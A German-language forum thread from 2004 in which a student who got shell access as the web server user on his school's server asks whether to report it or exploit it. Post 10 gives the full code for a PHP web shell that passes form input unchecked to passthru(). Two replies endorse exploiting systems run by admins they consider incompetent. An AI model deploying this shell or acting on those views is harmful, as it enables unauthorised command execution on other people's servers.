Moralische Frage...

Dieses Thema im Forum "Linux-Distributionen" wurde erstellt von bitumen, 12. Mai 2004.

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. bitumen

    bitumen Megabyte

    Registriert seit:
    4. Juni 2002
    Beiträge:
    1.952
    Grüß Euch!

    Ich habe zwei kleine php dateien geschrieben, mit deren Hilfe man als user die Rechte des webservers erreichen kann. Ich habe es bereits am Schulserver getestet, es funktioniert problemlos. sprich: ich habe bash zugriff als "apache".

    Nun zur Frage: Was ist die korrekte Vorgangsweise?

    - Admin berichten?
    - später ev auf diversen Mailinglists posten?
    - nichts unternehmen?
    (- selber ausnützen?)

    Danke und tschööö, bitumen
     
  2. rapmaster

    rapmaster Halbes Gigabyte

    Registriert seit:
    21. Juli 2002
    Beiträge:
    5.181
    nicht auf einem system, das mit sorgfalt konfiguriert wurde.

    mfg
     
  3. Donmato

    Donmato Megabyte

    Registriert seit:
    23. September 2002
    Beiträge:
    1.877
    dann sei schön artig;)
    der bug is aber auf sehr vielen apache maschinen drauf:D :D :D
     
  4. bitumen

    bitumen Megabyte

    Registriert seit:
    4. Juni 2002
    Beiträge:
    1.952
    ich habe mit dem admin geredet, er hat nicht gewusst, woher die mail an root von apache kommt :D
    Er hat gemeint, dass er im sommer susi91 draufmacht, und ich sollte die lücke nicht ausnützen :aua: :bse:

    greez, bitu
     
  5. rapmaster

    rapmaster Halbes Gigabyte

    Registriert seit:
    21. Juli 2002
    Beiträge:
    5.181
    /me benutzt fbsd
    und bei fbsd gibt standardmäßig nur für users shells, die sich wirklich auch einloggen können.

    mfg
     
  6. bitumen

    bitumen Megabyte

    Registriert seit:
    4. Juni 2002
    Beiträge:
    1.952
    tja, passthru hat der admin in der schule nicht gesperrt, und der www-user unter suse heißt "wwwrun", hat ein home-verzeichnis und hat /bin/bash als shell. blöder gehts nich mehr :D
     
  7. rapmaster

    rapmaster Halbes Gigabyte

    Registriert seit:
    21. Juli 2002
    Beiträge:
    5.181
    1. bei mir ist
    passthru
    gesperrt
    2. für den user www gibt's kein login :)

    mfg
     
  8. bitumen

    bitumen Megabyte

    Registriert seit:
    4. Juni 2002
    Beiträge:
    1.952
    schau dir den code an, den habe ich eh schon gepostet. außerdem kann ich mit
    das passwort für apache ändern und dann schön via ssh einloggen :D
     
  9. rapmaster

    rapmaster Halbes Gigabyte

    Registriert seit:
    21. Juli 2002
    Beiträge:
    5.181
    glaub ich irgendwie nicht.
    gib mal code her

    und kannst du auch auf datein oberhalb von ~ von www zugreifen oder nur unterhalb von ~

    mfg
     
  10. bitumen

    bitumen Megabyte

    Registriert seit:
    4. Juni 2002
    Beiträge:
    1.952
    Danke schonmal, ich poste den code, damit ihr wisst, worum es geht:

    send.html:
    <html>
    <form action="recive.php" method="post">
    <table><tr><th>webbash</ht></tr>
    <tr><td>command:<input type="text" name="bashcommand" /></td></tr>
    <tr><td><input type="submit" name="sent" value="enter" /></td></tr>
    </table>
    </form>
    </html>



    recive.php:
    <html>
    <p>
    output:
    <br>
    <br>

    <?php
    $shcommand = $_POST['bashcommand'];

    $output = passthru($shcommand);
    echo $output;
    ?>

    <br>
    <hr>
    <a href=send.html>new command</a>
    </p>
    </html>
     
  11. sAcKrAttE 2ooo

    sAcKrAttE 2ooo Halbes Megabyte

    Registriert seit:
    1. August 2002
    Beiträge:
    933
    kommt drauf an :
    is der server nur mies konfiguriert oder is dasn genereller bug in der software ?
    bei letzerem würd ich den bug reporten und nen exploit bereitstellen damit die jungs auch grund haben ihr zeug zu fixen.
    bei ersterem gibts zumindest für mich 2 möglichkeiten : ists ne scheiss-schule, überhebliche admins mit 0 ahnung usw... dann ausnutzen, sonst melden.

    mfg Sr2k
     
  12. DerDieDasEi

    DerDieDasEi ROM

    Registriert seit:
    5. Mai 2004
    Beiträge:
    7
    Also ich würde die Admins, wenn sie was unternehmen können, informieren, damit sie das Loch stopfen können.
    Allerdings in Foren, wo der Neuling einfach "n00b" genannt wird und der User der *** ist, würde ich?s ausnutzen!
     
Status des Themas:
Es sind keine weiteren Antworten möglich.

Diese Seite empfehlen